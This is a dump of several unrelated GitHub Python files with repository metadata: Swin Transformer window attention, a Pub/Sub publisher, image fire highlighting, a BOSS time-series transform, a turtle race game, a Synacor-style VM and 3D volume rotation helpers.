relative_coords_table[:, :, :, 1] /= (pretrain_window_size[1] - 1)\n else:\n relative_coords_table[:, :, :, 0] /= (self.window_size[0] - 1)\n relative_coords_table[:, :, :, 1] /= (self.window_size[1] - 1)\n relative_coords_table = torch.sign(relative_coords_table) * torch.log2(\n torch.abs(relative_coords_table) + 1.0) / np.log2(8)\n self.register_buffer(\"relative_coords_table\", relative_coords_table)\n\n # pair-wise relative position index for each token inside the windows\n\n coords_h = torch.arange(self.window_size[0])\n coords_w = torch.arange(self.window_size[1])\n coords = torch.stack(torch.meshgrid([\n coords_h, coords_w\n ]))\n coords_flatten = torch.flatten(coords, 1) # [2, win_h*win_w]\n relative_coords = coords_flatten[:, :, None] - coords_flatten[:, None, :] #[2, win_h*win_w, win_h* win_w]\n relative_coords = relative_coords.permute(1, 2, 0).contiguous()\n relative_coords[:, :, 0] += self.window_size[0] - 1\n relative_coords[:, :, 1] += self.window_size[1] - 1\n relative_coords[:, :, 0] *= 2 * self.window_size[1] - 1\n relative_position_index = relative_coords.sum(-1)\n self.register_buffer(\"relative_position_index\", relative_position_index)\n\n self.to_qkv = nn.Linear(in_channel, in_channel*3, bias=False)\n if qkv_bias:\n self.q_bias = nn.Parameter(torch.zeros(in_channel))\n self.v_bias = nn.Parameter(torch.zeros(in_channel))\n else:\n self.q_bias = None\n self.v_bias = None\n\n self.attn_drop = attn_drop\n self.proj_drop = proj_drop\n\n self.attn = nn.Softmax(dim=-1)\n self.proj = nn.Linear(in_channel, in_channel)\n\n def forward(self, x, mask=None):\n '''\n mask: (0/-inf) mask with shape of [num_windows, wh*ww, wh*ww]\n :param x: input feature [num_win*b, n, c]\n :return:\n '''\n B, N, C = x.shape\n qkv_bias = None\n if self.q_bias is not None:\n qkv_bias = torch.cat([self.q_bias, torch.zeros_like(self.v_bias, requires_grad=False), self.v_bias])\n\n qkv = F.linear(input=x, weight=self.to_qkv.weight, bias=qkv_bias)\n qkv = qkv.reshape(B, N, 3, self.num_heads, -1).permute(2, 0, 3, 1, 4)\n q, k, v = qkv[0], qkv[1], qkv[2]\n\n attn = torch.matmul((F.normalize(q, dim=-1)), F.normalize(k, dim=-1).transpose(-2, -1))\n\n # NOTE: this v2 forward is unfinished in the source file: it stops after\n # computing the cosine-similarity logits and only debug-prints the shapes.\n print(f'q shape: {q.shape}')\n print(f'k shape: {k.shape}')\n print(f'v shape: {v.shape}')\n\n return qkv\n\n\nclass WindowAttention(nn.Module):\n '''\n The original implementation\n copied from https://github.com/microsoft/Swin-Transformer/blob/main/models/swin_transformer.py\n '''\n def __init__(self, in_channel, window_size, num_heads, qkv_bias=True, attn_drop=0.0, proj_drop=0.0):\n super(WindowAttention, self).__init__()\n self.in_channel = in_channel\n self.window_size = window_size\n self.img_h, self.img_w = window_size\n self.num_heads = num_heads\n head_dim = in_channel // num_heads\n self.scale = head_dim ** -0.5\n\n # relative position bias parameter table\n self.relative_position_bias_table = nn.Parameter(\n torch.zeros((2 * window_size[0] - 1) * (2 * window_size[1] -1), num_heads)\n ) # [2*Wh - 1, 2*Ww - 1, num_heads]\n\n # pair-wise relative position index for each token inside the window\n coords_h = torch.arange(self.window_size[0])\n coords_w = torch.arange(self.window_size[1])\n coords = torch.stack(torch.meshgrid([coords_h, coords_w])) # [1, Wh, Ww]\n coords_flatten = torch.flatten(coords, 1) # [2, Wh*Ww]\n relative_coords = coords_flatten[:, :, None] - coords_flatten[:, None, :] #[2, Wh*Ww]\n relative_coords[:, :, 0] += self.window_size[0] - 1\n relative_coords[:, :, 1] += self.window_size[1] - 1\n relative_coords[:, :, 0] *= 2 * self.window_size[1] - 1\n relative_position_index = relative_coords.sum(-1) # [Wh*Ww, Wh*Ww]\n self.register_buffer(\"relative_position_index\", relative_position_index)\n\n self.to_qvk = nn.Linear(in_channel, in_channel * 3, bias=qkv_bias)\n self.attn_drop = nn.Dropout(attn_drop)\n self.proj = nn.Linear(in_channel, in_channel)\n self.proj_drop = nn.Dropout(proj_drop)\n\n trunc_normal_(self.relative_position_bias_table, std=0.02)\n self.attn = nn.Softmax(dim=-1)\n\n def forward(self, x, mask=None):\n '''\n\n :param x: [num_windows*B, N, C]\n :param mask: (num_windows, Wh*Ww, Wh*Ww) or None\n :return:\n '''\n\n B, N, C = x.shape\n qkv = self.to_qvk(x)\n # split heads: [B, N, 3*C] -> [3, B, num_heads, N, C // num_heads]\n qkv = einops.rearrange(qkv, 'b n (c1 nh c2) -> c1 b nh n c2', c1=3, c2=C//self.num_heads, nh=self.num_heads)\n #q, k, v = map(lambda t: einops.rearrange(t, 'b n (c nh) -> b n c nh', nh=self.num_heads), qkv)\n q, k, v = qkv[0], qkv[1], qkv[2]\n dot = torch.matmul(q, k.transpose(-2, -1)) * self.scale\n\n relative_position_bias = self.relative_position_bias_table[self.relative_position_index.view(-1)].view(\n self.window_size[0] * self.window_size[1], self.window_size[0] * self.window_size[1], -1\n )\n relative_position_bias = einops.rearrange(relative_position_bias, 'hw1 hw2 nh -> nh hw1 hw2').contiguous()\n dot = dot + relative_position_bias.unsqueeze(0)\n '''\n attn = softmax(q·k.T/sqrt(d) + b)·v\n '''\n\n if mask is not None:\n # [num_windows, Wh * Ww, Wh * Ww]\n nW = mask.shape[0]\n # dot = einops.rearrange(dot, '(b nw) nw nh')\n dot = dot.view(B // nW, nW, self.num_heads, N, N) + mask.unsqueeze(1).unsqueeze(0)\n dot = dot.view(-1, self.num_heads, N, N)\n attn = self.attn(dot)\n else:\n attn = self.attn(dot)\n\n attn = self.attn_drop(attn)\n attn = torch.matmul(attn, v).transpose(1, 2).reshape(B, N, C)\n attn = self.proj(attn)\n attn = self.proj_drop(attn)\n return attn\n\nclass SwinTransformerBlock(nn.Module):\n def __init__(self, in_channel, img_size, num_heads, window_size=7,\n shift_size=0, expan_ration=4, qkv_bias=True, qk_scale=None,\n dropout=0.0, attn_drop=0.0, drop_path=0.0):\n super(SwinTransformerBlock, self).__init__()\n self.in_channel = in_channel\n self.img_size = img_size\n self.num_heads = num_heads\n self.shift_size = shift_size\n self.expan_ration = expan_ration\n self.window_size=window_size\n if min(self.img_size) <= self.window_size:\n self.shift_size = 0\n self.window_size = min(self.img_size)\n\n self.norm = nn.LayerNorm(in_channel)\n '''\n def __init__(self, in_channel, window_size, num_heads, qkv_bias=True, attn_drop=0.0, proj_drop=0.0):\n '''\n self.attn = WindowAttention(\n in_channel=in_channel,\n window_size=to_2tuple(window_size),\n num_heads=num_heads,\n qkv_bias=qkv_bias,\n attn_drop=attn_drop,\n proj_drop=dropout\n )\n\n self.drop_path = DropPath(drop_path)\n hidden_dim = int(in_channel * expan_ration)\n self.ffn = FeedForward(in_channel=in_channel, out_channel=in_channel,hidden_dim=hidden_dim)\n\n if self.shift_size > 0:\n img_h, img_w = self.img_size\n img_mask = torch.zeros((1, img_h, img_w, 1))\n h_slices = (slice(0, -self.window_size),\n slice(-self.window_size, -self.shift_size),\n slice(-self.shift_size, None)\n )\n w_slices = (slice(0, -self.window_size),\n slice(-self.window_size, -self.shift_size),\n slice(-self.shift_size, None)\n )\n\n cnt = 0\n for h in h_slices:\n for w in w_slices:\n img_mask[:, h, w, :] = cnt\n cnt += 1\n\n mask_windows = window_partition(img_mask, self.window_size) # [nW, window_size, window_size, 1]\n mask_windows = mask_windows.view(-1, self.window_size * self.window_size)\n attn_mask = 
mask_windows.unsqueeze(1) - mask_windows.unsqueeze(2)\n attn_mask = attn_mask.masked_fill(attn_mask != 0, float(-100.0)).masked_fill(attn_mask == 0, float(0.0))\n\n else:\n attn_mask = None\n\n self.register_buffer(\"attn_mask\", attn_mask)\n\n def forward(self, x):\n H, W = self.img_size\n B, L, C = x.shape\n assert L == H * W, \"input feature has wrong size\"\n res = x\n x = self.norm(x)\n x = einops.rearrange(x, 'b (h w) c -> b h w c', h=H, w=W)\n\n # cyclic shift -> in my view the most elegant part of swin transformer:\n # it exploits translation invariance nicely while letting different windows communicate,\n # but the trick generalizes somewhat poorly and needs a lot of data to work\n if self.shift_size > 0:\n shifted_x = torch.roll(x, shifts=(-self.shift_size, -self.shift_size), dims=(1, 2))\n x_windows = window_partition(shifted_x, self.window_size) # [nW*B, window_size, window_size, C]\n else:\n shifted_x = x\n # partition windows\n x_windows = window_partition(shifted_x, self.window_size)\n # return [nW*B, window_size, window_size, C]\n\n x_windows = einops.rearrange(x_windows, \"wb ws1 ws2 c -> wb (ws1 ws2) c\")\n\n # attn\n attn_windows = self.attn(x_windows, mask=self.attn_mask)\n\n # merge\n attn_windows = attn_windows.view(-1, self.window_size, self.window_size, C)\n\n # reverse cyclic shift\n if self.shift_size > 0:\n shifted_x = window_reverse(attn_windows, self.window_size, H, W)\n x = torch.roll(shifted_x, shifts=(self.shift_size, self.shift_size), dims=(1, 2))\n\n else:\n shifted_x = window_reverse(attn_windows, self.window_size, H, W)\n x = shifted_x\n # [B H' W' C]\n\n x = einops.rearrange(x, 'b h w c -> b (h w) c')\n x = res + self.drop_path(x)\n\n #ffn\n x = x + self.drop_path(self.ffn(self.norm(x)))\n\n return x\n\n\n\nif __name__ == '__main__':\n\n x = torch.randn(1, 3, 54, 54)\n x = einops.rearrange(x, 'b c w h -> b (w h) c')\n patch_merging = PatchMerge(3, (54, 54))\n patch_merging_test = patch_merging(x)\n print(f'patch_merging_test: {patch_merging_test.shape}')\n\n ffn = FeedForward(3, 64, 32)\n ffn_test = ffn(x)\n print(f'ffn_test: {ffn_test.shape}')\n\n x_1 = torch.randn(1, 3, 54, 54)\n x_1 = einops.rearrange(x_1, \"b c w h -> b w h c\")\n window_partition_test = window_partition(x_1, 9)\n print(f'window_partition_test: {window_partition_test.shape}')\n\n window_reverse_test = window_reverse(window_partition_test, 9, 54, 54)\n print(f'after window_reverse: {window_reverse_test.shape}') # the partition -> reverse round trip restores x_1's shape\n y_2 = window_partition_test\n # def __init__(self, in_channel, window_size, num_heads, qkv_bias=True, attn_drop=0.0, proj_drop=0.0, mask=None, pretrain_window_size=[0, 0]):\n\n to_three_dim = nn.Linear(4, 12, bias=False)\n x = torch.randn(1, 64, 4)\n to_three_dim_test = to_three_dim(x)\n print(f'x shape {x.shape}')\n print(f'after to_qvk: {to_three_dim_test.shape}')","repo_name":"Qiaoqi-Zhuyan/transformers-units","sub_path":"attention/swin_transformer.py","file_name":"swin_transformer.py","file_ext":"py","file_size_in_byte":18743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"20315094542","text":"import logging, sys\n\nfrom library.constants import DATA_ROOT, LOG_ROOT, PROJECT_ID, TOPIC_NAME\nfrom google.cloud import pubsub_v1\n\nlogging.basicConfig(filename=LOG_ROOT+'unique_extractor.log', level=logging.DEBUG, format='%(levelname)s:%(asctime)s %(message)s')\n\nmatch_list = set()\n\n# Command line argument - fetch the matchID to process\nfileName = sys.argv[1]\n\npublisher = pubsub_v1.PublisherClient()\ntopic_path = publisher.topic_path(PROJECT_ID, TOPIC_NAME + '-new')\n\nfutures = dict()\n\nts = sys.argv[1]\n\nlogging.info(f'Process 
ID: {ts}: Extracting unique values')\n\nwith open(DATA_ROOT + 'serial_matches_' + fileName + '.log') as f:\n match_list = f.readlines()\n\nmatch_list = list(filter(None, [v.rstrip() for v in match_list]))\nmatch_list = set(match_list)\n\nwith open(DATA_ROOT + f'unique_serial_matches.log', \"a\") as f:\n for item in match_list:\n try:\n f.write(\"%s\\n\" % item)\n data = item\n publisher.publish(topic_path, data=data.encode('utf-8'))\n logging.info(f'Process ID: {ts}: Published message {str(item)} to queue')\n except Exception as e:\n logging.error(f'Error occurred {str(e)}, adding remaining match ids to original file')\n with open(DATA_ROOT + 'serial_matches_failed_transactions.log', 'a') as t:\n t.write(\"%s\\n\" % item)\n logging.debug(f'Added match id to the serial_matches_failed_transactions.log')\n\nlogging.info(f'Process ID: {ts}: Process completed successfully.')\n","repo_name":"bhaargav006/dota-pipeline","sub_path":"data_dump/unique_extractor.py","file_name":"unique_extractor.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"41736906708","text":"\"\"\"\nFile: fire.py\n---------------------------------\nThis file contains a method called\nhighlight_fires which detects the\npixels that are recognized as fire\nand highlights them for better observation.\n\"\"\"\nfrom simpleimage import SimpleImage\n\n\nHURDLE_FACTOR = 1.05\n\n\ndef highlight_fires(filename):\n \"\"\"\n :param filename: str, the file path of the original image.\n :return: the img that highlight the fire area and darken others.\n \"\"\"\n img = SimpleImage(filename)\n for pixel in img:\n avg = (pixel.red + pixel.blue + pixel.green) // 3\n if pixel.red > avg * HURDLE_FACTOR:\n pixel.red = 255\n pixel.blue = 0\n pixel.green = 0\n else:\n pixel.red = avg\n pixel.blue = avg\n pixel.green = avg\n return img\n\n\ndef main():\n \"\"\"\n This program shows highlight the fire area in the picture.\n \"\"\"\n original_fire = SimpleImage('images/greenland-fire.png')\n original_fire.show()\n highlighted_fire = highlight_fires('images/greenland-fire.png')\n highlighted_fire.show()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Rita-Ning/sc-turing","sub_path":"stanCode-Project/my photoshop/fire.py","file_name":"fire.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"511984208","text":"from pcsmobile.handle.wsgi._base import _BaseHandler\nfrom util.constants import Constants\nfrom util.fetch import Fetcher\nfrom util.render import Renderer\n\nfrom util.TimeZone import current_time\nfrom util.TimeZone import from_isostring\n\nclass _BaseChooseHandler (_BaseHandler):\n def __init__(self):\n super(_BaseChooseHandler, self).__init__()\n \n def _build_chooser_values(self):\n \"\"\"Get a dictionary of values that every chooser uses.\"\"\"\n values = {}\n \n values['return_url'] = self._get_param('return_url')\n values['return_param'] = self._get_param('return_param')\n values['current_value'] = self._get_param('current_value')\n \n reflect_params = [\n [arg[8:], value]\n for arg, value in self._get_params().items()\n if arg.startswith('reflect_')]\n values['reflect_params'] = reflect_params\n \n return 
values\n\n","repo_name":"mjumbewu/pcs-mobile","sub_path":"pcsmobile/handle/wsgi/_chooser.py","file_name":"_chooser.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"15415781336","text":"from src.transformation.SFA import *\n\n\nclass BOSS():\n\n def __init__(self, maxF, maxS, windowLength, normMean, logger = None):\n self.maxF = maxF\n self.symbols = maxS\n self.windowLength = windowLength\n self.normMean = normMean\n self.signature = None\n logger.Log(self.__dict__, level = 0)\n self.logger = logger\n\n\n def createWords(self, samples):\n if self.signature == None:\n self.signature = SFA(\"EQUI_DEPTH\", logger = self.logger)\n self.signature.fitWindowing(samples, self.windowLength, self.maxF, self.symbols, self.normMean, True)\n self.signature.printBins(self.logger)\n\n words = []\n for i in range(samples[\"Samples\"]):\n sfaWords = self.signature.transformWindowing(samples[i])\n words_small = []\n for word in sfaWords:\n words_small.append(self.createWord(word, self.maxF, int2byte(self.symbols)))\n words.append(words_small)\n\n return words\n\n\n def createWord(self, numbers, maxF, bits):\n shortsPerLong = int(round(60 / bits))\n to = min([len(numbers), maxF])\n\n b = 0\n s = 0\n shiftOffset = 1\n for i in range(s, (min(to, shortsPerLong + s))):\n shift = 1\n for j in range(bits):\n if (numbers[i] & shift) != 0:\n b |= shiftOffset\n shiftOffset <<= 1\n shift <<= 1\n\n limit = 2147483647\n total = 2147483647 + 2147483648\n while b > limit:\n b = b - total - 1\n return b\n\n\n def createBagOfPattern(self, words, samples, f):\n bagOfPatterns = [BagOfBigrams(samples[j].label) for j in range(samples[\"Samples\"])]\n # bagOfPatterns = []\n usedBits = int2byte(self.symbols)\n mask = (1 << (usedBits * f)) - 1\n\n for j in range(len(words)):\n BOP = {}\n lastWord = -9223372036854775808\n for offset in range(len(words[j])):\n word = words[j][offset] & mask\n if word != lastWord:\n if word in BOP.keys():\n BOP[word] += 1\n else:\n BOP[word] = 1\n lastWord = word\n bagOfPatterns[j].bob = BOP\n return bagOfPatterns\n\n\n def int2byte(self, number):\n log = 0\n if (number & 0xffff0000) != 0:\n number >>= 16\n log = 16\n if number >= 256:\n number >>= 8\n log += 8\n if number >= 16:\n number >>= 4\n log += 4\n if number >= 4:\n number >>= 2\n log += 2\n return log + (number >> 1)\n\n\n def bag2dict(self, bag):\n bag_dict = []\n for list in bag:\n new_dict = {}\n for element in list:\n if element in new_dict.keys():\n new_dict[element] += 1\n else:\n new_dict[element] = 1\n bag_dict.append(new_dict)\n return bag_dict\n\n\nclass BagOfBigrams():\n def __init__(self, label):\n self.bob = {}\n self.label = int(label)\n","repo_name":"sharford5/SFA_Python","sub_path":"src/transformation/BOSS.py","file_name":"BOSS.py","file_ext":"py","file_size_in_byte":3186,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"76"} +{"seq_id":"678188623","text":"from turtle import Turtle, Screen\nfrom random import choice, randint\n\n\n\nscreen = Screen()\nscreen.title(\"Welcome to Turtle Race!\")\nscreen.bgcolor('#ffffff')\nscreen.setup(width=500, height=400)\nuser_bet = screen.textinput(title='Make your bet', prompt='Which turtle will win the race? 
Enter a color: ').lower()\n# print(user_bet)\n\n\n\nfinish_line = Turtle()\nfinish_line.penup()\nfinish_line.goto(x=235, y=195)\nfinish_line.pendown()\nfinish_line.goto(x=235, y=-185)\nfinish_line.hideturtle()\n\n\ncolors = ['purple', 'blue', 'orange', 'red', 'gold', 'green']\n\n\n\ndef turtle_factory():\n    '''Creates turtles and gives them a color'''\n    nts_list = [] # ninja turtles list\n    y = -165\n    used_colors = []\n    \n    for i in range(len(colors)):\n        tmnts = Turtle(shape='turtle') # teenage mutant ninja turtles\n        tmnts.penup()\n        tmnts.goto(x=-235, y=y)\n        \n        tmnts.color(choice(colors))\n        used_colors.append(tmnts.pencolor())\n\n        if tmnts.pencolor() in used_colors:\n            colors.remove(tmnts.pencolor())\n\n        nts_list.append(tmnts)\n        y += 65 # add spacing\n    return nts_list\n\nnts = turtle_factory()\n\n\n\ndef turtles_run():\n    '''Prompts turtles to start the race'''\n    for nt in nts:\n        if nt.xcor() > finish_line.xcor():\n            winner = Turtle()\n            winner.penup()\n            winner.hideturtle()\n            winner.color(nt.pencolor())\n            winner.write('The winner is ' + nt.pencolor(), align='center', font=('Arial', 25))\n\n            winner.goto(x=0, y=-25)\n            if user_bet == nt.pencolor():\n                winner.write(\"You've guessed right!\", align='center', font=('Arial', 15))\n            else:\n                winner.write(\"Incorrect guess. Try again!\", align='center', font=('Arial', 15))\n\n            return nt.pencolor() # returns winning color(s)\n        else:\n            nt.forward(randint(0, 25)) # the lower the range, the greater the chance of a stack overflow\n    \n    turtles_run() # recursive function\nturtles_run()\n\n\n\nscreen.exitonclick()","repo_name":"SaintClever/etch_a_sketch_and_turtle_race","sub_path":"turtle_race.py","file_name":"turtle_race.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
{"seq_id":"14113939763","text":"import json\n\nclass Archivo:\n    ruta = 'usuarios.json'\n\n    def __init__(self, ruta):\n        self.ruta = ruta\n\n    def leer(self):\n        archivo = open(self.ruta, 'r')\n        usuarios = archivo.read()\n        usuarios = json.loads(usuarios)\n        archivo.close()\n        return usuarios\n\n    def escribir(self, nuevos_usuarios):\n        archivo = open(self.ruta, 'w')\n        archivo.write(json.dumps(nuevos_usuarios))\n        archivo.close()","repo_name":"EduardoPlata/introduccion_python","sub_path":"archivo.py","file_name":"archivo.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
{"seq_id":"70955524087","text":"# -*- coding: utf-8 -*-\n\nimport logging\nimport sys\nimport numpy as np\n\nlogging.basicConfig()\nlogger = logging.getLogger('vm')\n# logger.setLevel(logging.DEBUG)\nFILE_PATH = './challenge.bin'\nMAX = 2**15\n\n\nclass Op(object):\n    '''\n    DESCRIPTION\n    -----------\n    Interface for operation processing\n    '''\n    _id = None\n    _operands = None\n    _vm = None\n\n    def __init__(self, vm, next=None):\n        self._vm = vm\n        self._id = next or self._vm._mem[self._vm._i]\n        self._run()\n\n    def __shift(self):\n        self._vm._i += 1\n\n    def __unshift(self):\n        self._vm._i -= 1\n\n    def __get_next_val(self):\n        res = self._vm._mem[self._vm._i]\n        return res\n\n    def __set_val(self, addr, v):\n        if addr >= MAX:\n            self._vm._set_reg(addr, v)\n        else:\n            self._vm._mem[addr] = v\n\n    def __get_vals(self, n, raw=False):\n        res = []\n        for i in xrange(n):\n            self.__shift()\n            v = self.__get_next_val()\n            if not raw and v >= MAX:\n                v = self._vm._reg[v % MAX]\n            res.append(v)\n        if n == 1:\n            return res[0]\n        return res\n\n    def __get_mem(self, addr):\n        res = None\n        if addr >= MAX:\n            res 
= self._vm._reg[addr % MAX]\n        else:\n            res = self._vm._mem[addr]\n        return res\n\n    def __check_reg(self, r):\n        if r >= MAX:\n            return self._vm._reg[r % MAX]\n        return r\n\n    def _run(self):\n        op = self._get_op()\n        if op:\n            logger.debug('****pointer={}, inst={} a={} b={} c={}, reg={}, stack={}'.format(\n                self._vm._i,\n                self._vm._mem[self._vm._i],\n                self._vm._mem[self._vm._i + 1],\n                self._vm._mem[self._vm._i + 2],\n                self._vm._mem[self._vm._i + 3],\n                self._vm._reg,\n                self._vm._stack,\n            ))\n            op()\n        else:\n            logger.warn(\"Unknown operation type {}\".format(self._id))\n        self.__shift()\n\n    def _get_op(self):\n        func_name = '_'.join(('', 'op', str(self._id)))\n        if hasattr(self, func_name):\n            return getattr(self, func_name)\n\n    def _op_0(self):\n        '''\n        exiting\n        '''\n        logger.debug('FINISHED')\n        exit()\n\n    def _op_1(self):\n        '''\n        set register a to value of b\n        '''\n        r, v = self.__get_vals(2, raw=True)\n        self._vm._set_reg(r, v)\n\n    def _op_21(self):\n        '''\n        no op\n        '''\n        # logger.debug('NO_OP CODE GOT')\n        pass\n\n    def _op_19(self):\n        '''\n        print next char\n        '''\n        val = self.__get_vals(1)\n        sys.stdout.write(unichr(val))\n        sys.stdout.flush()\n\n    def _op_2(self):\n        '''\n        push a onto the stack\n        '''\n        v = self.__get_vals(1)\n        self._vm._stack.append(v)\n\n    def _op_3(self):\n        '''\n        remove the top element from the stack and write it into <a>; empty stack = error\n        '''\n        self.__shift()\n        a = self.__get_next_val()\n        v = self._vm._stack.pop()\n        self.__set_val(a, v)\n\n    def _op_4(self):\n        '''\n        set <a> to 1 if <b> is equal to <c>; set it to 0 otherwise\n        '''\n        a, b, c = self.__get_vals(3, raw=True)\n\n        b = self.__check_reg(b)\n        c = self.__check_reg(c)\n\n        if b == c:\n            self.__set_val(a, 1)\n        else:\n            self.__set_val(a, 0)\n\n    def _op_5(self):\n        '''\n        set <a> to 1 if <b> is greater than <c>; set it to 0 otherwise\n        '''\n        a, b, c = self.__get_vals(3, raw=True)\n        b = self.__check_reg(b)\n        c = self.__check_reg(c)\n        if b > c:\n            self.__set_val(a, 1)\n        else:\n            self.__set_val(a, 0)\n\n    def _jmp(self, val):\n        '''\n        jump to <a>\n        '''\n        self._vm._jmp(val)\n        self.__unshift() # for moving back from main cycle\n\n    def _op_6(self):\n        self._jmp(self.__get_vals(1))\n\n    def _op_7(self):\n        '''\n        jump if a is not zero to b\n        '''\n        v, addr = self.__get_vals(2)\n        if v > 0:\n            self._jmp(addr)\n\n    def _op_8(self):\n        '''\n        jump if a is zero to b\n        '''\n        v, addr = self.__get_vals(2)\n        if (v % MAX) == 0:\n            self._jmp(addr)\n\n    def _op_9(self):\n        '''\n        assign into <a> the sum of <b> and <c> (modulo 32768)\n        '''\n        a, b, c = self.__get_vals(3, raw=True)\n        self.__set_val(a, (b + c) % MAX)\n\n    def _op_10(self):\n        '''\n        store into <a> the product of <b> and <c> (modulo 32768)\n        '''\n        a, b, c = self.__get_vals(3, raw=True)\n        b = self.__check_reg(b)\n        c = self.__check_reg(c)\n        self.__set_val(a, (b * c) % MAX)\n\n    def _op_11(self):\n        '''\n        store into <a> the remainder of <b> divided by <c>\n        '''\n        a, b, c = self.__get_vals(3, raw=True)\n        b = self.__check_reg(b)\n        c = self.__check_reg(c)\n        self.__set_val(a, b % c)\n\n    def _op_12(self):\n        '''\n        stores into <a> the bitwise and of <b> and <c>\n        '''\n        a, b, c = self.__get_vals(3, raw=True)\n        b = self.__check_reg(b)\n        c = self.__check_reg(c)\n        self.__set_val(a, b & c)\n\n    def _op_13(self):\n        '''\n        stores into <a> the bitwise or of <b> and <c>\n        '''\n        a, b, c = self.__get_vals(3, raw=True)\n        b = self.__check_reg(b)\n        c = self.__check_reg(c)\n        self.__set_val(a, b | c)\n\n    def _op_14(self):\n        '''\n        stores 15-bit bitwise inverse of <b> in <a>\n        '''\n        a, b = self.__get_vals(2, raw=True)\n        b = self.__check_reg(b)\n        v = (2 ** 15) - b - 1\n        self.__set_val(a, v)\n\n    def _op_15(self):\n        '''\n        read memory at 
address <b> and write it to <a>\n        '''\n        a, b = self.__get_vals(2, raw=True)\n        b = self.__check_reg(b)\n        self.__set_val(a, self.__get_mem(b))\n\n    def _op_16(self):\n        '''\n        write the value from <b> into memory at address <a>\n        '''\n        a, b = self.__get_vals(2)\n        self.__set_val(a, b)\n\n    def _op_17(self):\n        '''\n        write the address of the next instruction to the stack and jump to <a>\n        '''\n        self._vm._stack.append(self._vm._i + 2)\n        self._jmp(self.__check_reg(self.__get_vals(1, raw=True)))\n\n    def _op_18(self):\n        '''\n        remove the top element from the stack and jump to it; empty stack = halt\n        '''\n        addr = self._vm._stack.pop()\n        if not addr:\n            self._op_0()\n        self._jmp(addr)\n\n\nclass VM(object):\n    _mem = []\n    _reg = [0] * 8\n    _stack = []\n    _i = 0\n\n    # for saving state:\n    _mems = set()\n    _regs = set()\n    _stacks = set()\n    _is = set()\n\n    _last_state = None\n\n    def __init__(self, in_file):\n        self._read_commands(in_file)\n        self._run()\n\n    def _save_state(self):\n        self._mems.add(frozenset(self._mem))\n        self._regs.add(frozenset(self._reg))\n        self._stacks.add(frozenset(self._stack))\n        self._is.add(self._i)\n\n    def _get_state(self):\n        return sum((len(i) for i in (self._mems, self._regs, self._stacks, self._is)))\n\n    def _jmp(self, val):\n        self._i = val\n\n    def _set_reg(self, r, v):\n        r_index = r % MAX\n        self._reg[r_index] = v\n\n    def _run(self):\n        '''\n        DESCRIPTION\n        -----------\n        Execution of read commands\n        '''\n        op = Op(self)\n        self._save_state()\n        repeated = 100\n        while op and repeated + 1:\n            Op(self)\n            self._save_state()\n            state = self._get_state()\n            if self._last_state == state:\n                if repeated > 0:\n                    repeated -= 1\n                else:\n                    raise ValueError('Endless loop probably, state {}'.format(self._last_state))\n            self._last_state = state\n\n    def _read_commands(self, in_file):\n        '''\n        DESCRIPTION\n        -----------\n        Read commands from in_file and put them into _mem\n        in_file: str\n            filename of input file with commands\n        '''\n        self._mem = np.fromfile(in_file, dtype=np.dtype(' x-axis rotation\n    # (2,0) -> y-axis rotation\n    # (1,0) -> z-axis rotation\n\n    # V = rotate(V, alpha, mode='constant', cval=0, order=3, axes=(1, 0), reshape=False)\n    # V = rotate(V, beta, mode='constant', cval=0, order=3, axes=(2, 1), reshape=False)\n\n    V = rotate(V, alpha, mode='constant', cval=0,\n               order=3, axes=(2, 1), reshape=False)\n    V = rotate(V, beta, mode='constant', cval=0,\n               order=3, axes=(2, 0), reshape=False)\n    V = rotate(V, gamma, mode='constant', cval=0,\n               order=3, axes=(1, 0), reshape=False)\n    return V\n\n\ndef rotate_volume_zxinv(V, alpha, beta, gamma):\n\n    alpha = np.rad2deg(alpha)\n    beta = np.rad2deg(beta)\n    gamma = np.rad2deg(gamma)\n\n    # (2,1) -> x-axis rotation\n    # (2,0) -> y-axis rotation\n    # (1,0) -> z-axis rotation\n\n    # V = rotate(V, alpha, mode='constant', cval=0, order=3, axes=(1, 0), reshape=False)\n    # V = rotate(V, beta, mode='constant', cval=0, order=3, axes=(2, 1), reshape=False)\n\n    V = rotate(V, alpha, mode='constant', cval=0,\n               order=3, axes=(1, 0), reshape=False)\n    V = rotate(V, beta, mode='constant', cval=0,\n               order=3, axes=(2, 1), reshape=False)\n    V = rotate(V, gamma, mode='constant', cval=0,\n               order=3, axes=(1, 0), reshape=False)\n    return V\n\n\ndef create_mask3d(resolution):\n    x3, y3, z3 = np.indices((resolution, resolution, resolution))\n    x3, y3, z3 = x3-resolution/2, y3-resolution/2, z3-resolution/2\n    mask3d = (x3**2+y3**2+z3**2) < (resolution/2)**2\n\n    return mask3d\n\n\ndef create_r(resolution):\n    x2, y2 = np.indices((resolution, resolution))\n    x2, y2 = x2-resolution/2, y2-resolution/2\n    r = 
